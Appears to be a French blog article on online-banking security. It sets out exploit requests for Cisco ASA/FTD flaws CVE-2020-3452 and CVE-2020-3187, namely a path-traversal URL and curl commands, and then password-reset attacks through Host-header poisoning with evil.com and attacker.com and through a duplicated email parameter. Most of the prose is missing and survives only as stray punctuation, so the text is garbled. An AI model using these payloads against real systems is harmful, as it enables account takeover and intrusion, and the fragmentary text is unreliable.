Clever Geek Handbook

Problèmes de sécurité des services bancaires en ligne

Bonjour les amis!





Aujourd'hui, nous parlerons des problèmes urgents de sécurité des systèmes bancaires, nous analyserons les vulnérabilités communes et tirerons des conclusions sur la base des problèmes actuels.





Important

Encore une fois, l'auteur ne garantit pas de vous montrer comment protéger complètement votre système contre les cybermenaces, il souhaite seulement montrer les problèmes auxquels vous devez prêter attention.





1. Services VPN SSL

Les banques utilisent très souvent les services VPN SSL de Cisco pour organiser l'accès à distance à leur réseau interne





, .. Cisco CVE-2020-3452 CVE-2020-3187





1.1. CVE-2020-3452

CVE-2020-3452 - Cisco ASA FTD. , , , HTTP- .









https://bank.com/+CSCOT+/translation-table?type=mst&textdomain=/%252bCSCOE%252b/portal_inc.lua&default-language&lang=../









, .





1.2. CVE-2020-3187





/session_password.html 200





curl -k -s -i https://



Cisco-VPN/+CSCOE+/session_password.html







200? -





"/+CSCOU+/csco_logo.gif"







curl -k -H "Cookie: token=../+CSCOU+/csco_logo.gif" https://



Cisco-VPN/+CSCOE+/session_password.html







VPN .





2. & OAuth

- (SSO) OAuth 2.0, , , .





GET /auth/sso/cb?code=[sso token account] HTTP/1.1

Host: bank.com

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8

Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Connection: close









CSRF . - .





  1. SSO





  2. SSO ,





  3. .





  4. SSO .





redirect_uri - url . / .









POST https://bank.com/reset.php HTTP/1.1

Accept: /

Content-Type: application/json

Host: evil.com











Host: bank.com

X-Forwarded-Host: attacker.com











Host: target.com

Host: attacker.com







email .









https://evil.com/reset-password.php?token=12345678-1234-1234-1234-12345678901





- . , .





.





POST /resetPassword

[…]

email=victim@email.com&email=attacker@email.com







Dans la requête, vous pouvez voir que l'attaquant a simplement dupliqué le paramètre email et indiqué son mail auquel le jeton d'autorisation sera envoyé.





Production

Gardez vos services à jour, que ce soit SSL VPN ou GlobalProtect.





Gardez l'authentification sécurisée





En guise d'astuce également, utilisez un pare-feu d'application Web (  WAF  ) pour empêcher l'exploitation des vulnérabilités causées par les changements de code.





Bonne chance! Tous mes vœux.







More articles:


All Articles